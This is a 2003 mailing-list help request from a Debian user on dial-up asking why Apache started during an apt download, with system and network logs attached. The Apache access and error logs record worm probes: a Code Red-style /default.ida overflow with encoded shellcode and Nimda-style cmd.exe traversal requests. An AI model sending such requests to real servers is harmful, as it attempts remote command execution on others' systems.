port 80 access while downloading over ppp ?
Hello,
I know this isn't strictly laptop related, but i really would like to
learn what was happening, and i know quite a few networkers on this
list. Perhaps you can give me your opinion ?
Last night i was apt downloading over a slow modem when i did notice something
started apache processes on my box (debian woody 3.0r1).
Apache is started from inetd here, listening on port 80, just for local
document reading (like dhelp).
I'm on a standard serial modem ppp dialup, with a NIC occasionally connected
to a little local LAN (but no route to the internet).
First i thought of some weird interference between running processes.
Then i read 'cmd.exe' in the apache log, and i get worried someone trying to
access my (assumed windows) box. Now i think i really have no clue.
When online, a wwwoffle proxy is started from ip-up (mainly as webcache),
listening on localhost:8080. I wonder if wwwoffle could can cache some
strange javescripts ? I go aks this on the wwwoffle list.
Meanwhile i tried some diagnosis, but i as i said, i am rather unexperienced
and didn't know what to do. E.g. i didn't notice the exact time of my stats.
I don't know what information would be important to interprete the issue.
I just attach all my few collected logging.
Greets
--
mi <mrl>
--------------------------------------------------------------------------------------------------------
Date: Jul 10 2003 after midnight
... = skipped log entries
( ) = my comments (mostly to remind myself)
------------------ Log entries -------------------------------
============= pppd log (overview of connected time)
Jul 9 23:35:43 woody pppd[1133]: pppd 2.4.1 started by michl, uid 1000
... (chat)
Jul 9 23:36:15 woody chat[1134]: -- got it
Jul 9 23:36:15 woody chat[1134]: send (\d)
Jul 9 23:36:16 woody pppd[1133]: Serial connection established.
Jul 9 23:36:16 woody pppd[1133]: using channel 3
Jul 9 23:36:16 woody pppd[1133]: Using interface ppp0
Jul 9 23:36:16 woody pppd[1133]: Connect: ppp0 <--> /dev/ttyS0
Jul 9 23:36:17 woody pppd[1133]: sent [LCP ConfReq id=0x1 <asyncmap 0x0>
<magic 0x24f2079d> <pcomp> <accomp>]
...
...
Jul 9 23:36:27 woody pppd[1133]: local IP address 213.218.5.248
Jul 9 23:36:27 woody pppd[1133]: remote IP address 195.2.163.147
Jul 9 23:36:27 woody pppd[1133]: primary DNS address 212.126.200.40
Jul 9 23:36:27 woody pppd[1133]: secondary DNS address 195.2.171.40
Jul 9 23:36:27 woody pppd[1133]: Script /etc/ppp/ip-up started (pid 1150)
Jul 9 23:36:29 woody pppd[1133]: Script /etc/ppp/ip-up finished (pid 1150),
status = 0x1
-> apt-download and apache-thing (noticed around 00:50)
Jul 10 00:56:01 woody pppd[1133]: Terminating on signal 15.
Jul 10 00:56:01 woody pppd[1133]: Script /etc/ppp/ip-down started (pid 1721)
..
Jul 10 00:56:01 woody pppd[1133]: Connect time 79.8 minutes.
Jul 10 00:56:01 woody pppd[1133]: Sent 546535 bytes, received 21016901 bytes.
...
Jul 10 00:56:01 woody pppd[1133]: Exit.
================= Custom console log:
Jul 9 23:36:27 woody logger: ==== ip-up: executing dns: ====
Jul 9 23:36:27 woody logger: xxxxxxxxx ntpdate: Checking timestamp xxxxxxxxx
... (updating time from 130.133.1.10)
Jul 9 23:36:27 woody logger: time-stamp: 09.07.2003
Jul 9 23:36:27 woody logger: date-day: 09.07.2003
Jul 9 23:36:27 woody logger: Date clock:Wed Jul 9 23:36:27 CEST 2003
Jul 9 23:36:27 woody logger: System clock:Wed Jul 9 23:36:28
Jul 9 23:36:27 woody logger: Timesatamp of today -- ok, exiting.
Jul 9 23:36:27 woody logger: xxxxxxxxx ntpdate: .... done. xxxxxxxxxx
Jul 9 23:36:28 woody wwwoffled[1219]: WWWOFFLE Demon Version 2.7a (with
zlib,without ipv6) started.
... (local web-cache proxy)
Jul 9 23:36:28 woody wwwoffled[1225]: Detached from terminal and changed pid
to 1225.
Jul 9 23:36:28 woody wwwoffled[1225]: WWWOFFLE Connection from host woody
(127.0.0.1).
Jul 9 23:36:28 woody wwwoffled[1225]: WWWOFFLE Online.
Jul 9 23:36:29 woody logger: ==== ip-up: .... finished. ====
... ( aptitude 'go' requesting a cd before starting download:)
Jul 9 23:37:29 woody kernel: ISO 9660 Extensions: Microsoft Joliet Level 3
Jul 9 23:37:30 woody kernel: ISO 9660 Extensions: RRIP_1991A
... (download starting)
Jul 10 00:00:24 woody -- MARK --
Jul 10 00:20:24 woody -- MARK --
( Suddenly something called port 80, which invoked apache.
My local IP is 213.218.5.248, remote is 195.2.bla )
Jul 10 00:21:41 woody apache[1537]: connect from 213.157.182.3
Jul 10 00:40:24 woody -- MARK --
Jul 10 00:43:11 woody apache[1609]: connect from 213.37.21.54
Jul 10 00:43:16 woody apache[1610]: connect from 213.37.21.54
Jul 10 00:43:22 woody apache[1611]: connect from 213.37.21.54
Jul 10 00:43:28 woody apache[1612]: connect from 213.37.21.54
Jul 10 00:43:34 woody apache[1613]: connect from 213.37.21.54
Jul 10 00:43:40 woody apache[1615]: connect from 213.37.21.54
Jul 10 00:43:47 woody apache[1616]: connect from 213.37.21.54
Jul 10 00:43:55 woody apache[1617]: connect from 213.37.21.54
Jul 10 00:44:04 woody apache[1618]: connect from 213.37.21.54
Jul 10 00:44:13 woody apache[1619]: connect from 213.37.21.54
Jul 10 00:44:24 woody apache[1620]: connect from 213.37.21.54
...
(No more entries. Around 00:50 i started some tracking,
including ping and traceroute, around 00:54 apt finished,
and 00:56 i shut down the ppp link)
========== apache error.log (this is the interesting stuff ;-)
(log snip starting from day before with local connection standard
message)
[Wed Jul 9 01:59:24 2003] [info] mod_unique_id: using ip addr 127.0.0.1
[Thu Jul 10 00:21:44 2003] [error] [client 213.157.182.3] File does not exist:
/var/www/default.ida
[Thu Jul 10 00:43:12 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/root.exe
[Thu Jul 10 00:43:17 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/MSADC/root.exe
[Thu Jul 10 00:43:23 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/c/winnt/system32/cmd.exe
[Thu Jul 10 00:43:29 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/d/winnt/system32/cmd.exe
[Thu Jul 10 00:43:35 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/..%5c../winnt/system32/cmd.exe
[Thu Jul 10 00:43:41 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Thu Jul 10 00:43:48 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Thu Jul 10 00:43:56 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
[Thu Jul 10 00:44:05 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/..Á../winnt/system32/cmd.exe
[Thu Jul 10 00:44:25 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/..À¯../winnt/system32/cmd.exe
(no more log entries)
========== apache access log:
127.0.0.1 - - [09/Jul/2003:22:56:32 +0200] "GET
/?xml+version=%221.0%22?%3E%3C!DOCTYPE+xbel+PUBLIC+%22+//IDN+python.org//DTD+XML+Bookmark+Exchange+Language+1.0//EN//XML%22+%22http://www.python.org/topics/xml/dtds/xbel-1.0.dtd%22%3E%3Cxbel+version=%221.0%22%3E++%3Ctitle%3EDummy+folder%3C/title%3E++%3Cbookmark+href=%22http://www.cs.hmc.edu/~me/linux/dell_inspiron_4150.html%22%3E++++%3Ctitle%3EInspiron+4150+++Debian%3C/title%3E++++%3Cinfo%3E++++++%3Cmetadata+owner=%22http://galeon.sourceforge.net/%22%3E++++++++%3Ctime_added%3E1047242448%3C/time_added%3E++++++%3C/metadata%3E++++%3C/info%3E++%3C/bookmark%3E%3C/xbel%3E
HTTP/1.0" 200 4120 "-" "Mozilla/5.0 Galeon/1.2.6 (X11; Linux i586; U;)
Gecko/20021127 Debian/1.2.6-2"
(this was my galeon browser last evening)
213.157.182.3 - - [10/Jul/2003:00:21:44 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 303 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:12 +0200] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 308 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:17 +0200] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 306 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:23 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:29 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:35 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:41 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:48 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:56 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 363 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:05 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:14 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:25 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
--------------- Humble diagnose started around 00:50 ---------------------
========== netstat -a
Aktive Internetverbindungen (Server und stehende Verbindungen)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:32768 *:* LISTEN
tcp 0 0 *:32769 *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:7110 *:* LISTEN
tcp 0 0 *:discard *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:webcache *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:10000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:tproxy *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 dip-248.breisnet-:33070 tutankhamon.acc.umu:www VERBUNDEN
tcp 15 0 dip-248.breisnet-:33069 klecker.debian.org:ftp CLOSE_WAIT
udp 0 0 *:32768 *:*
udp 0 0 *:2049 *:*
udp 0 0 *:32770 *:*
udp 0 0 *:32771 *:*
udp 0 0 *:talk *:*
udp 0 0 *:ntalk *:*
udp 0 0 *:discard *:*
udp 0 0 *:10000 *:*
udp 0 0 *:789 *:*
udp 0 0 *:sunrpc *:*
Aktive Sockets in der UNIX Domäne (Server und stehende Verbindungen)
Proto RefZäh Flaggen Typ Zustand I-Node Pfad
unix 2 [ ACC ] STREAM HÖRT 508 /var/run/lprng/socket
unix 2 [ ACC ] STREAM HÖRT 1564
/tmp/.font-unix/fs7110
unix 2 [ ACC ] STREAM HÖRT 2010
/tmp/ksocket-michl/kdeinit-:0
unix 2 [ ACC ] STREAM HÖRT 2043
/tmp/ksocket-michl/klauncherUe9Vub.slave-socket
unix 2 [ ACC ] STREAM HÖRT 1743 /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM HÖRT 2015
/tmp/.ICE-unix/dcop602-1057782131
unix 8 [ ] DGRAM 177 /dev/log
unix 2 [ ACC ] STREAM HÖRT 110616 /dev/gpmctl
unix 2 [ ACC ] STREAM HÖRT 1770
/tmp/ssh-XXYdB1Me/agent.555
unix 2 [ ACC ] STREAM HÖRT 2075
/tmp/orbit-michl/orb-2061394323126919559
unix 2 [ ACC ] STREAM HÖRT 2084
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 2 [ ACC ] STREAM HÖRT 2099
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 111500 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 111499
unix 2 [ ] DGRAM 110458
unix 2 [ ] DGRAM 70176
unix 2 [ ] DGRAM 63330
unix 3 [ ] STREAM VERBUNDEN 2210 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2209
unix 3 [ ] STREAM VERBUNDEN 2208
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2207
unix 3 [ ] STREAM VERBUNDEN 2198 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2197
unix 3 [ ] STREAM VERBUNDEN 2196
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2195
unix 3 [ ] STREAM VERBUNDEN 2194 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2193
unix 3 [ ] STREAM VERBUNDEN 2109
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 2106
unix 3 [ ] STREAM VERBUNDEN 2094
/tmp/orbit-michl/orb-2061394323126919559
unix 3 [ ] STREAM VERBUNDEN 2093
unix 3 [ ] STREAM VERBUNDEN 2092
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 3 [ ] STREAM VERBUNDEN 2091
unix 2 [ ] DGRAM 2083
unix 3 [ ] STREAM VERBUNDEN 2070 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2069
unix 3 [ ] STREAM VERBUNDEN 2054 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2053
unix 3 [ ] STREAM VERBUNDEN 2050
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2049
unix 3 [ ] STREAM VERBUNDEN 2036
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2035
unix 3 [ ] STREAM VERBUNDEN 2030
unix 3 [ ] STREAM VERBUNDEN 2029
unix 3 [ ] STREAM VERBUNDEN 1965 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1964
unix 3 [ ] STREAM VERBUNDEN 1945 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1944
unix 3 [ ] STREAM VERBUNDEN 1773 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1772
unix 3 [ ] STREAM VERBUNDEN 1749
/tmp/.font-unix/fs7110
unix 3 [ ] STREAM VERBUNDEN 1748
unix 3 [ ] STREAM VERBUNDEN 1751 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1745
unix 2 [ ] DGRAM 408
unix 2 [ ] DGRAM 210
========== ifconfig
(eth0 not connected)
lo Protokoll:Lokale Schleife
inet Adresse:127.0.0.1 Maske:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:6284 errors:0 dropped:0 overruns:0 frame:0
TX packets:6284 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:0
RX bytes:1758729 (1.6 MiB) TX bytes:1758729 (1.6 MiB)
ppp0 Protokoll:Punkt-zu-Punkt Verbindung
inet Adresse:213.218.5.248 P-z-P:195.2.163.147
Maske:255.255.255.255
UP PUNKTZUPUNKT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:13643 errors:222 dropped:0 overruns:0 frame:0
TX packets:9358 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:3
RX bytes:20079433 (19.1 MiB) TX bytes:507610 (495.7 KiB)
=========== route
Kernel IP Routentabelle
Ziel Router Genmask Flags Metric Ref Use Iface
pm3-fr2.toplink * 255.255.255.255 UH 0 0 0 ppp0
woodynic * 255.255.255.0 U 0 0 0 eth0
default pm3-fr2.toplink 0.0.0.0 UG 0 0 0 ppp0
============ ping 213.37.21.54
64 bytes from 213.37.21.54: icmp_seq=0 ttl=105 time=3701.8 ms
64 bytes from 213.37.21.54: icmp_seq=1 ttl=105 time=3842.0 ms
64 bytes from 213.37.21.54: icmp_seq=2 ttl=105 time=4009.2 ms
64 bytes from 213.37.21.54: icmp_seq=3 ttl=105 time=3600.0 ms
64 bytes from 213.37.21.54: icmp_seq=4 ttl=105 time=3760.0 ms
64 bytes from 213.37.21.54: icmp_seq=5 ttl=105 time=3630.0 ms
--- 213.37.21.54 ping statistics ---
9 packets transmitted, 6 packets received, 33% packet loss
round-trip min/avg/max = 3600.0/3757.1/4009.2 ms
============ traceroute 213.37.21.54 (meanwhile apt download finished)
1 pm3-fr2.toplink-plannet.de (195.2.163.147) 135.167 ms 129.648 ms
119.909 ms
2 a391c.fe0-0-2.frances.fre1.toplink-plan.net (195.2.163.145) 119.987 ms
121.406 ms 119.941 ms
3 bca1e.ser6-0.susan.stu1.toplink-plan.net (195.2.188.161) 129.954 ms
119.903 ms 119.837 ms
4 c032e.ser6-0.kay.kar1.toplink-plan.net (212.126.192.50) 119.959 ms
129.809 ms 189.951 ms
5 c892c.bbo1.carmen.kar1.toplink-plan.net (212.126.200.146) 129.957 ms
119.829 ms 120.051 ms
6 1e11c.bbo4.franca.fra3.toplink-plan.net (213.218.30.17) 138.241 ms
139.860 ms 129.956 ms
7 24e9d.1.level3.ups.fra3.toplink-plan.net (62.67.36.233) 140.273 ms
130.399 ms 119.423 ms
8 ae0-55.mp1.Frankfurt1.Level3.net (195.122.136.97) 119.853 ms 139.829 ms
119.950 ms
9 so-0-0-0.mp1.London2.Level3.net (212.187.128.61) 139.879 ms 139.886 ms
149.948 ms
10 so-1-0-0.bbr1.Washington1.level3.net (212.187.128.138) 219.904 ms
209.861 ms 209.913 ms
11 so-6-0-0.edge1.Washington1.Level3.net (209.244.11.10) 219.926 ms 209.820
ms 219.946 ms
12 65.59.88.210 (65.59.88.210) 229.919 ms 209.792 ms 209.959 ms
13 if-5-0.core1.Newark.Teleglobe.net (66.110.8.18) 219.956 ms 219.952 ms
229.639 ms
14 if-7-0.core2.Newark.Teleglobe.net (207.45.222.162) 228.369 ms 229.811 ms
219.929 ms
15 if-8-0.core2.London2.Teleglobe.net (66.110.8.142) 309.909 ms 289.833 ms
299.938 ms
16 if-5-0.core1.London2.teleglobe.net (195.219.15.217) 299.900 ms 289.823
ms 299.926 ms
17 if-5-0.core1.Madrid.Teleglobe.net (195.219.133.61) 329.950 ms 338.502 ms
321.244 ms
18 if-6-0.core2.Madrid.Teleglobe.net (195.219.149.77) 329.939 ms 319.830 ms
329.919 ms
19 * * *
20 10.127.1.26 (10.127.1.26) 330.034 ms 329.843 ms 329.894 ms
21 62.100.101.6 (62.100.101.6) 329.972 ms 329.831 ms 329.963 ms
22 10.21.2.100 (10.21.2.100) 330.034 ms 329.907 ms 329.882 ms
23 10.42.211.2 (10.42.211.2) 320.006 ms 370.627 ms 329.220 ms
24 213.37.21.54 (213.37.21.54) 799.852 ms * 601.702 ms
========== apt sources.list download targets (dns pinged)
ftp://ftp.de.debian.org (141.76.2.4)
ftp://security.debian.org (194.109.137.218)
# GNOME 2 Backports:
http://mirror.raw.no/ (129.241.93.49)
http://ftp.acc.umu.se/ (130.239.18.173)
----------------- Later comparisons -----------------------
=========== netstat -a after apt download finished (same ppp link open)
Aktive Internetverbindungen (Server und stehende Verbindungen)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:32768 *:* LISTEN
tcp 0 0 *:32769 *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:7110 *:* LISTEN
tcp 0 0 *:discard *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:webcache *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:10000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:tproxy *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
udp 0 0 *:32768 *:*
udp 0 0 *:2049 *:*
udp 0 0 *:32770 *:*
udp 0 0 *:32771 *:*
udp 0 0 *:talk *:*
udp 0 0 *:ntalk *:*
udp 0 0 *:discard *:*
udp 0 0 *:10000 *:*
udp 0 0 *:789 *:*
udp 0 0 *:sunrpc *:*
Aktive Sockets in der UNIX Domäne (Server und stehende Verbindungen)
Proto RefZäh Flaggen Typ Zustand I-Node Pfad
unix 2 [ ACC ] STREAM HÖRT 508 /var/run/lprng/socket
unix 2 [ ACC ] STREAM HÖRT 1564
/tmp/.font-unix/fs7110
unix 2 [ ACC ] STREAM HÖRT 2010
/tmp/ksocket-michl/kdeinit-:0
unix 2 [ ACC ] STREAM HÖRT 2043
/tmp/ksocket-michl/klauncherUe9Vub.slave-socket
unix 2 [ ACC ] STREAM HÖRT 1743 /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM HÖRT 2015
/tmp/.ICE-unix/dcop602-1057782131
unix 8 [ ] DGRAM 177 /dev/log
unix 2 [ ACC ] STREAM HÖRT 110616 /dev/gpmctl
unix 2 [ ACC ] STREAM HÖRT 1770
/tmp/ssh-XXYdB1Me/agent.555
unix 2 [ ACC ] STREAM HÖRT 2075
/tmp/orbit-michl/orb-2061394323126919559
unix 2 [ ACC ] STREAM HÖRT 2084
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 2 [ ACC ] STREAM HÖRT 2099
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 116566 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 116565
unix 3 [ ] STREAM VERBUNDEN 111500 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 111499
unix 2 [ ] DGRAM 110458
unix 2 [ ] DGRAM 70176
unix 2 [ ] DGRAM 63330
unix 3 [ ] STREAM VERBUNDEN 2210 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2209
unix 3 [ ] STREAM VERBUNDEN 2208
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2207
unix 3 [ ] STREAM VERBUNDEN 2198 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2197
unix 3 [ ] STREAM VERBUNDEN 2196
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2195
unix 3 [ ] STREAM VERBUNDEN 2194 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2193
unix 3 [ ] STREAM VERBUNDEN 2109
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 2106
unix 3 [ ] STREAM VERBUNDEN 2094
/tmp/orbit-michl/orb-2061394323126919559
unix 3 [ ] STREAM VERBUNDEN 2093
unix 3 [ ] STREAM VERBUNDEN 2092
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 3 [ ] STREAM VERBUNDEN 2091
unix 2 [ ] DGRAM 2083
unix 3 [ ] STREAM VERBUNDEN 2070 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2069
unix 3 [ ] STREAM VERBUNDEN 2054 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2053
unix 3 [ ] STREAM VERBUNDEN 2050
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2049
unix 3 [ ] STREAM VERBUNDEN 2036
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2035
unix 3 [ ] STREAM VERBUNDEN 2030
unix 3 [ ] STREAM VERBUNDEN 2029
unix 3 [ ] STREAM VERBUNDEN 1965 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1964
unix 3 [ ] STREAM VERBUNDEN 1945 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1944
unix 3 [ ] STREAM VERBUNDEN 1773 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1772
unix 3 [ ] STREAM VERBUNDEN 1749
/tmp/.font-unix/fs7110
unix 3 [ ] STREAM VERBUNDEN 1748
unix 3 [ ] STREAM VERBUNDEN 1751 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1745
unix 2 [ ] DGRAM 408
unix 2 [ ] DGRAM 210
======== netstat -a with ppp0 down
Aktive Internetverbindungen (Server und stehende Verbindungen)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:32768 *:* LISTEN
tcp 0 0 *:32769 *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:7110 *:* LISTEN
tcp 0 0 *:discard *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:webcache *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:10000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:tproxy *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 woody:tproxy woody:33073 TIME_WAIT
udp 0 0 *:32768 *:*
udp 0 0 *:2049 *:*
udp 0 0 *:32770 *:*
udp 0 0 *:32771 *:*
udp 0 0 *:talk *:*
udp 0 0 *:ntalk *:*
udp 0 0 *:discard *:*
udp 0 0 *:10000 *:*
udp 0 0 *:789 *:*
udp 0 0 *:sunrpc *:*
Aktive Sockets in der UNIX Domäne (Server und stehende Verbindungen)
Proto RefZäh Flaggen Typ Zustand I-Node Pfad
unix 2 [ ACC ] STREAM HÖRT 508 /var/run/lprng/socket
unix 2 [ ACC ] STREAM HÖRT 1564
/tmp/.font-unix/fs7110
unix 2 [ ACC ] STREAM HÖRT 2010
/tmp/ksocket-michl/kdeinit-:0
unix 2 [ ACC ] STREAM HÖRT 2043
/tmp/ksocket-michl/klauncherUe9Vub.slave-socket
unix 2 [ ACC ] STREAM HÖRT 1743 /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM HÖRT 2015
/tmp/.ICE-unix/dcop602-1057782131
unix 7 [ ] DGRAM 177 /dev/log
unix 2 [ ACC ] STREAM HÖRT 110616 /dev/gpmctl
unix 2 [ ACC ] STREAM HÖRT 1770
/tmp/ssh-XXYdB1Me/agent.555
unix 2 [ ACC ] STREAM HÖRT 2075
/tmp/orbit-michl/orb-2061394323126919559
unix 2 [ ACC ] STREAM HÖRT 2084
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 2 [ ACC ] STREAM HÖRT 2099
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 116566 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 116565
unix 3 [ ] STREAM VERBUNDEN 111500 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 111499
unix 2 [ ] DGRAM 110458
unix 2 [ ] DGRAM 70176
unix 3 [ ] STREAM VERBUNDEN 2210 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2209
unix 3 [ ] STREAM VERBUNDEN 2208
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2207
unix 3 [ ] STREAM VERBUNDEN 2198 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2197
unix 3 [ ] STREAM VERBUNDEN 2196
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2195
unix 3 [ ] STREAM VERBUNDEN 2194 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2193
unix 3 [ ] STREAM VERBUNDEN 2109
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 2106
unix 3 [ ] STREAM VERBUNDEN 2094
/tmp/orbit-michl/orb-2061394323126919559
unix 3 [ ] STREAM VERBUNDEN 2093
unix 3 [ ] STREAM VERBUNDEN 2092
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 3 [ ] STREAM VERBUNDEN 2091
unix 2 [ ] DGRAM 2083
unix 3 [ ] STREAM VERBUNDEN 2070 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2069
unix 3 [ ] STREAM VERBUNDEN 2054 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2053
unix 3 [ ] STREAM VERBUNDEN 2050
